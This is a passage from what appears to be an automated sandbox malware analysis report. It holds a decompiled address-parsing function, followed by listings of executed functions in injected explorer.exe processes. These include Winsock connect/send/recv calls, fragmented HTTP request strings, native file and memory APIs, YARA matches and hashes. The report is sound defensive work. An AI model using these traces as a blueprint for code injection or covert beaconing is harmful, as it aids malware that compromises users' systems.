					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E00A3EE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E00A3EE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E00A3685D(_t167, 4) == 0) {
								if(E00A3685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E00A3685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E00A3685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E00A18980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E00A0DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E00A3EE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E00A3EE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

0x00a3fcd1
0x00a3fcd6
0x00a3fcd9
0x00a3fcdc
0x00a3fcdf
0x00a3fce2
0x00a3fce5
0x00a3fce8
0x00a3fceb
0x00a3fced
0x00a3fced
0x00a3fcf3
0x00000000
0x00000000
0x00a3fcfc
0x00a3fcfe
0x00a3fdc1
0x00a6ecbd
0x00000000
0x00a6eccc
0x00a6eccc
0x00a6ecd2
0x00000000
0x00000000
0x00a6ecdf
0x00a6ece0
0x00a6ece4
0x00a6eceb
0x00a6ecee
0x00a6eca8
0x00a6eca8
0x00a6ecaa
0x00a3fd76
0x00a3fd79
0x00a3fdb4
0x00a3fdb5
0x00a3fdb6
0x00000000
0x00a3fdb6
0x00a3fd7e
0x00a6ecfc
0x00a3fe2f
0x00000000
0x00a3fe2f
0x00a6ed08
0x00a6ed0f
0x00a6ed17
0x00a6ed1b
0x00000000
0x00a6ed1b
0x00a3fd88
0x00000000
0x00000000
0x00a3fd94
0x00a3fd99
0x00a3fda1
0x00000000
0x00000000
0x00a3fdb0
0x00000000
0x00a3fdb0
0x00a6ecbd
0x00a3fdc7
0x00a3fdcb
0x00000000
0x00a3fdd7
0x00a3fde3
0x00a3fe06
0x00a51fe7
0x00000000
0x00000000
0x00a51fef
0x00a51ff0
0x00a51ff4
0x00a51ff7
0x00a51ffa
0x00a51ffd
0x00a52000
0x00000000
0x00000000
0x00a6ecf1
0x00000000
0x00a6ecf1
0x00000000
0x00a3fe06
0x00a3fde8
0x00a3fdec
0x00a3fdef
0x00a3fdf2
0x00000000
0x00a3fdf2
0x00a3fdcb
0x00a3fd04
0x00a3fd05
0x00a6ec67
0x00000000
0x00000000
0x00a6ec6f
0x00000000
0x00a6ec6f
0x00a3fd13
0x00a3fd3c
0x00a3fd40
0x00a6ec75
0x00a6ec7a
0x00000000
0x00a6ec8a
0x00a6ec8a
0x00a6ec90
0x00a6ecb2
0x00a3fd73
0x00a3fd73
0x00000000
0x00a3fd73
0x00a6ec95
0x00000000
0x00000000
0x00a6eca1
0x00a6eca4
0x00a6eca5
0x00000000
0x00a6eca5
0x00a6ec7a
0x00a3fd4a
0x00000000
0x00a3fd6e
0x00a3fd6e
0x00a3fd71
0x00000000
0x00a3fd71
0x00a3fd4a
0x00a3fd21
0x00a4a3a1
0x00000000
0x00a4a3a1
0x00a3fd36
0x00a5200b
0x00a52012
0x00000000
0x00000000
0x00a52018
0x00000000
0x00a52018
0x00000000
0x00a3fd36
0x00a3fe0f
0x00a3fe16
0x00a4a3ad
0x00000000
0x00000000
0x00a4a3b3
0x00a4a3b3
0x00a3fe1f
0x00a6ed25
0x00a6ed86
0x00000000
0x00000000
0x00a6ed91
0x00a6ed95
0x00a6ed95
0x00a6ed9a
0x00a6edad
0x00a6edb3
0x00a6edba
0x00a6edc4
0x00a6edc9
0x00000000
0x00a6edcc
0x00a6ed2a
0x00a6ed55
0x00000000
0x00000000
0x00a6ed61
0x00a6ed66
0x00a6ed6e
0x00000000
0x00000000
0x00a6ed7d
0x00000000
0x00a6ed7d
0x00a6ed30
0x00000000
0x00000000
0x00a6ed3c
0x00a6ed43
0x00a6ed4b
0x00000000
0x00000000
0x00000000
0x00000000

APIs

__fassign.LIBCMT ref: 00A3FD94

Memory Dump Source

Source File: 00000005.00000002.2169976003.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2169961205.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170219261.0000000000AD0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170235218.0000000000AE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170248852.0000000000AE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170281985.0000000000AE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170291563.0000000000AF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2170339566.0000000000B50000.00000040.00000001.sdmp Download File

Similarity

API ID: __fassign
String ID:
API String ID: 3965848254-0
Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction ID: ec7cf41994a5f1220f04a7fae334367f5fa7f8fa50bc84eae926909f4ab92885
Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction Fuzzy Hash: E1919E75E1021AEFDF28DF99C845AAEB7B4FF55309F30807AE401A71A2E7305A45CB91

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: explorer.exe PID: 1388 Parent PID: 2768 explorer.exeCOMMON

Executed Functions

Function 02972302, Relevance: 23.7, APIs: 3, Strings: 10, Instructions: 911networkCOMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32 ref: 029724AE
setsockopt.WS2_32 ref: 02972CB2
recv.WS2_32 ref: 02972CDA

Strings

dat=, xrefs: 029726A4
&un=, xrefs: 02972948
=, xrefs: 029728D0
Co, xrefs: 02972726
GET , xrefs: 02972768
tion, xrefs: 02972736
: cl, xrefs: 0297273E
&br=, xrefs: 02972979
ose, xrefs: 02972746
nnec, xrefs: 0297272E

Memory Dump Source

Source File: 00000006.00000002.2348189689.0000000002910000.00000040.00000001.sdmp, Offset: 02910000, based on PE: false

Similarity

API ID: getaddrinforecvsetsockopt
String ID: Co$&br=$&un=$: cl$=$GET $dat=$nnec$ose$tion
API String ID: 1564272048-2976227712
Opcode ID: b31e8b864956b6b4abfa9b859ad4291af29cc5130ca763e476aa0a2d5a1583bf
Instruction ID: 256333f818e4e33b32c2bcc05140a0369d77c3fb491bb9af41b192202c94fd23
Opcode Fuzzy Hash: b31e8b864956b6b4abfa9b859ad4291af29cc5130ca763e476aa0a2d5a1583bf
Instruction Fuzzy Hash: 25626330628B088BD769EF68D4947EAB7E6FF94300F50492ED49BC7242EF34A546CB45

Uniqueness

Uniqueness Score: -1.00%

Function 0296EEFE, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMON

Download Yara Rule

APIs

closesocket.WS2_32 ref: 0296EF57

Strings

ket, xrefs: 0296EF2A
esoc, xrefs: 0296EF22
clos, xrefs: 0296EF1A

Memory Dump Source

Source File: 00000006.00000002.2348189689.0000000002910000.00000040.00000001.sdmp, Offset: 02910000, based on PE: false

Similarity

API ID: closesocket
String ID: clos$esoc$ket
API String ID: 2781271927-3604069445
Opcode ID: debb1de1ae8bd1935cf3204c4e922018d3bc3bd1fa25b861d450e182fb477b51
Instruction ID: 24171bcd2969841e37bb99262fd0578f3184ccc4ab0ec4ac6d72b36c53fffef0
Opcode Fuzzy Hash: debb1de1ae8bd1935cf3204c4e922018d3bc3bd1fa25b861d450e182fb477b51
Instruction Fuzzy Hash: ABF0907021CB089FCBC0DF1894887E9B7E0FB99314F54057DE48ECA204CB7885428783

Uniqueness

Uniqueness Score: -1.00%

Function 0296EF02, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON

Download Yara Rule

APIs

closesocket.WS2_32 ref: 0296EF57

Strings

ket, xrefs: 0296EF2A
esoc, xrefs: 0296EF22
clos, xrefs: 0296EF1A

Memory Dump Source

Source File: 00000006.00000002.2348189689.0000000002910000.00000040.00000001.sdmp, Offset: 02910000, based on PE: false

Similarity

API ID: closesocket
String ID: clos$esoc$ket
API String ID: 2781271927-3604069445
Opcode ID: 38f943f3a1bf856e04ab8ffe01a156dfd9c5375a96730fcfdde4480564b18170
Instruction ID: 2a36f479d4f989f49dfff330e0491474d20b98a34e3e0438a60cfdab4652ce60
Opcode Fuzzy Hash: 38f943f3a1bf856e04ab8ffe01a156dfd9c5375a96730fcfdde4480564b18170
Instruction Fuzzy Hash: 08F01D70218B089FCB84DF18D0C8769B7E0FB99314F54556DA44ECA244CB7489468B83

Uniqueness

Uniqueness Score: -1.00%

Function 0296EE7E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52networkCOMMON

Download Yara Rule

APIs

connect.WS2_32 ref: 0296EEE1

Strings

conn, xrefs: 0296EEAA
ect, xrefs: 0296EEB1

Memory Dump Source

Source File: 00000006.00000002.2348189689.0000000002910000.00000040.00000001.sdmp, Offset: 02910000, based on PE: false

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: fb95bafb82b3473d6ef4390d0af350634b81bde5baa335949624609cad2727e7
Instruction ID: 36fdb6cf6cd6acbbacefc971890e710578c0101ae6473e0713907a6f22d16e4d
Opcode Fuzzy Hash: fb95bafb82b3473d6ef4390d0af350634b81bde5baa335949624609cad2727e7
Instruction Fuzzy Hash: 9E012C70618A088FDB84EF5CE088B15BBE0EB59314F1545AEE94DCB267CBB4CC858B85

Uniqueness

Uniqueness Score: -1.00%

Function 0296EE82, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51networkCOMMON

Download Yara Rule

APIs

connect.WS2_32 ref: 0296EEE1

Strings

conn, xrefs: 0296EEAA
ect, xrefs: 0296EEB1

Memory Dump Source

Source File: 00000006.00000002.2348189689.0000000002910000.00000040.00000001.sdmp, Offset: 02910000, based on PE: false

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: 26898fd5f90645f94afd46a3ac35e2686c27f416d54a17c3d9a13a012a848fc3
Instruction ID: a8988d057ab08459244b698af9a3af16c98a2e0ed2e3b425c6f8da607b8dcd43
Opcode Fuzzy Hash: 26898fd5f90645f94afd46a3ac35e2686c27f416d54a17c3d9a13a012a848fc3
Instruction Fuzzy Hash: 0701EC71658A088FDB94EF5CE488B15B7E0EB58315F1545AEA94DCB266CB70C8818B81

Uniqueness

Uniqueness Score: -1.00%

Function 0296EDF7, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55networkCOMMON

Download Yara Rule

APIs

send.WS2_32 ref: 0296EE63

Strings

send, xrefs: 0296EE2A

Memory Dump Source

Source File: 00000006.00000002.2348189689.0000000002910000.00000040.00000001.sdmp, Offset: 02910000, based on PE: false

Similarity

API ID: send
String ID: send
API String ID: 2809346765-2809346765
Opcode ID: 06a0e18ca9c1e1e84b1de7ba9482a901a96b4c92f796fb4ce4398a9b5ac61c15
Instruction ID: 26ac20e26df98b737d6ad97ac973b77ed49f2b23a0bcc1043f01ec42a047cb98
Opcode Fuzzy Hash: 06a0e18ca9c1e1e84b1de7ba9482a901a96b4c92f796fb4ce4398a9b5ac61c15
Instruction Fuzzy Hash: 4101E170518A188FDB94EF5CA089B1577E4EB98324F1545AE984DCB266CB70D881CB82

Uniqueness

Uniqueness Score: -1.00%

Function 0296EE02, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53networkCOMMON

Download Yara Rule

APIs

send.WS2_32 ref: 0296EE63

Strings

send, xrefs: 0296EE2A

Memory Dump Source

Source File: 00000006.00000002.2348189689.0000000002910000.00000040.00000001.sdmp, Offset: 02910000, based on PE: false

Similarity

API ID: send
String ID: send
API String ID: 2809346765-2809346765
Opcode ID: 3773d62206420a3ed138edb7b0d1187259b6e4662953c22d04494397483c12ef
Instruction ID: bcdc62be374625ac3cef207e235584fb621de17d6065b31982f9e06576519af9
Opcode Fuzzy Hash: 3773d62206420a3ed138edb7b0d1187259b6e4662953c22d04494397483c12ef
Instruction Fuzzy Hash: A1011E3061CA088FDB88EF5CE088B15B7E0EB9C324F1545AED84DCB266CB70D881CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0296ED02, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 0296ED61

Strings

sock, xrefs: 0296ED29

Memory Dump Source

Source File: 00000006.00000002.2348189689.0000000002910000.00000040.00000001.sdmp, Offset: 02910000, based on PE: false

Similarity

API ID: socket
String ID: sock
API String ID: 98920635-2415254727
Opcode ID: 324350153747078c09b6e059cc1e16611ed0418a95caa11cf7f7e91404692acf
Instruction ID: 00b99a6940cac92c9288752b37f583fd259dc3ec041f5db69dfb98d077bd9cd5
Opcode Fuzzy Hash: 324350153747078c09b6e059cc1e16611ed0418a95caa11cf7f7e91404692acf
Instruction Fuzzy Hash: 4C014B70658A188FDB84EF5CE048B14BBE0FB98314F1941AEE84DCB376C7B0C9418B86

Uniqueness

Uniqueness Score: -1.00%

Function 0296A272, Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

SleepEx.KERNEL32 ref: 0296A2BD

Memory Dump Source

Source File: 00000006.00000002.2348189689.0000000002910000.00000040.00000001.sdmp, Offset: 02910000, based on PE: false

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: fd57b9079238b9e4bf1c504420f21d1e9a897069bc43c21d39ffc44af76478d5
Instruction ID: 45466fe8669a626acd445efdcca7e69ad5457a93d19e6801634de68c66426f42
Opcode Fuzzy Hash: fd57b9079238b9e4bf1c504420f21d1e9a897069bc43c21d39ffc44af76478d5
Instruction Fuzzy Hash: 79218030614B4D8FCBA4EF5880D87BAB3E6FB95304F48067E891DDB206CB309840CB91

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: explorer.exe PID: 2792 Parent PID: 1388 explorer.exeCOMMON

Executed Functions

Function 000982AA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL( =,?,?,00093D20,00000000,FFFFFFFF), ref: 00098305

Strings

=, xrefs: 00098304
M;, xrefs: 000982CC, 000982D4

Memory Dump Source

Source File: 00000007.00000002.2346737399.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID: =$M;
API String ID: 3535843008-4116308358
Opcode ID: 7496235e16e5d58e53be64ca01548fc9be127a7adf09a79139db7960123d7955
Instruction ID: edcc7d224d2560fa485bd318a416677550ccf322cdee79f898dd125b9249493d
Opcode Fuzzy Hash: 7496235e16e5d58e53be64ca01548fc9be127a7adf09a79139db7960123d7955
Instruction Fuzzy Hash: D5E092726012147BCA14EBD89C81ED7776CEB89750F018995FA0C6B242C931E61087E0

Uniqueness

Uniqueness Score: -1.00%

Function 0009816A, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 67filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00093B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00093B87,007A002E,00000000,00000060,00000000,00000000), ref: 000981FD

Strings

.z`, xrefs: 000981ED, 000981F8

Memory Dump Source

Source File: 00000007.00000002.2346737399.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: a14770132c47a7a8dca4067d042575e19a4ba6fdc4471edf15cf57cf4e8eb847
Instruction ID: 59add5c5d5380ead6c17f12a7d94ad5f1e985e3e7652bb9415c88fce29002b1e
Opcode Fuzzy Hash: a14770132c47a7a8dca4067d042575e19a4ba6fdc4471edf15cf57cf4e8eb847
Instruction Fuzzy Hash: 4B11D7B2640108ABCB04DF98DC85EEB77ADEF8C754F118158BA1997281CA30E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 000981AB, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00093B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00093B87,007A002E,00000000,00000060,00000000,00000000), ref: 000981FD

Strings

.z`, xrefs: 000981ED, 000981F8

Memory Dump Source

Source File: 00000007.00000002.2346737399.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 65bc63e6a1c7ebbbd24d2bbdc7766abc86d1626e8e6d1bc2ea7f5f53815dd31f
Instruction ID: bedcc3a4eb291ebb35fb65004bf80d85e1204b79a7a3619e01381af5ba65e496
Opcode Fuzzy Hash: 65bc63e6a1c7ebbbd24d2bbdc7766abc86d1626e8e6d1bc2ea7f5f53815dd31f
Instruction Fuzzy Hash: 0B01B6B6205108AFCB08CF89DC95EEB37ADAF8C754F158248FA1D97241CA30E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 000981B0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00093B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00093B87,007A002E,00000000,00000060,00000000,00000000), ref: 000981FD

Strings

.z`, xrefs: 000981ED, 000981F8

Memory Dump Source

Source File: 00000007.00000002.2346737399.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 6fa3522381f922765747cb413a560a638f34a07a77bac4188ecd542ea8fada8f
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 3DF0B6B2201108ABCB08CF89DC85DEB77ADAF8C754F158248BA0D97241C630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 000982DF, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL( =,?,?,00093D20,00000000,FFFFFFFF), ref: 00098305

Strings

=, xrefs: 000982FC, 00098304

Memory Dump Source

Source File: 00000007.00000002.2346737399.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID: =
API String ID: 3535843008-3560468456
Opcode ID: 4c85637d85347bae027fdf46749f3af08025fbbe2c72a9783b718a9d920e12f8
Instruction ID: 15fac9fd85dafeaba2f523f2975c3408bb1b0f4dcf9929d2812081e9a0c62985
Opcode Fuzzy Hash: 4c85637d85347bae027fdf46749f3af08025fbbe2c72a9783b718a9d920e12f8
Instruction Fuzzy Hash: 87E0C2352002007BDB10DFA5CC85EDB7B68EF44350F154199FA0DDB342C530E5008BD0

Uniqueness

Uniqueness Score: -1.00%

Function 000982E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL( =,?,?,00093D20,00000000,FFFFFFFF), ref: 00098305

Strings

=, xrefs: 000982FC, 00098304

Memory Dump Source

Source File: 00000007.00000002.2346737399.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID: =
API String ID: 3535843008-3560468456
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 9045585dbcf6f62545025eb08aed1c60fbdcfac0c4e7976329d12629e07866ea
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: BFD012752002146BDB10EF99CC45ED7775CEF44750F154455BA189B342C930F90087E0

Uniqueness

Uniqueness Score: -1.00%

Function 00098260, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,FFFFFFFF,00093A01,?,?,?,?,00093A01,FFFFFFFF,?,B=,?,00000000), ref: 000982A5

Memory Dump Source

Source File: 00000007.00000002.2346737399.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: bed45cf130e08865842418422f5209c84d04630db3e9acde41b4be393811b9d6
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 6CF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158248BA1D97241DA30E8118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0009838A, Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00082D11,00002000,00003000,00000004), ref: 000983C9

Memory Dump Source

Source File: 00000007.00000002.2346737399.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: bb19c188bc40ed1d3ae6cb616027d28a3af9f7ba2300e0df4966f4539d613fa3
Instruction ID: aa6c3451668a46f47480d26a7a2e87184c336a0f0e51452d18eda42597ec70f3
Opcode Fuzzy Hash: bb19c188bc40ed1d3ae6cb616027d28a3af9f7ba2300e0df4966f4539d613fa3
Instruction Fuzzy Hash: 5BF05EB52001146FCB14CF99CC40EE77BA9AF88250F15825DBA4997381C630E811CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00098390, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00082D11,00002000,00003000,00000004), ref: 000983C9

Memory Dump Source

Source File: 00000007.00000002.2346737399.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 40387beaf1419a180c31e2cff737e2f724b9fe9c60f55009042e5faa2de09132
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 76F015B2200208ABCB14DF89CC81EEB77ADAF88750F118148BE0897341CA30F810CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 028E00C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 028E00CF

Memory Dump Source

Source File: 00000007.00000002.2347860208.00000000028D0000.00000040.00000001.sdmp, Offset: 028C0000, based on PE: true

Associated: 00000007.00000002.2347854761.00000000028C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347942469.00000000029B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347947125.00000000029C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347951963.00000000029C4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347956525.00000000029C7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347960772.00000000029D0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347997731.0000000002A30000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846

Uniqueness

Uniqueness Score: -1.00%

Function 028E07AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 028E07B7

Memory Dump Source

Source File: 00000007.00000002.2347860208.00000000028D0000.00000040.00000001.sdmp, Offset: 028C0000, based on PE: true

Associated: 00000007.00000002.2347854761.00000000028C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347942469.00000000029B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347947125.00000000029C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347951963.00000000029C4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347956525.00000000029C7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347960772.00000000029D0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347997731.0000000002A30000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487

Uniqueness

Uniqueness Score: -1.00%

Function 028DFAB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 028DFAC3

Memory Dump Source

Source File: 00000007.00000002.2347860208.00000000028D0000.00000040.00000001.sdmp, Offset: 028C0000, based on PE: true

Associated: 00000007.00000002.2347854761.00000000028C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347942469.00000000029B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347947125.00000000029C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347951963.00000000029C4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347956525.00000000029C7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347960772.00000000029D0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347997731.0000000002A30000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
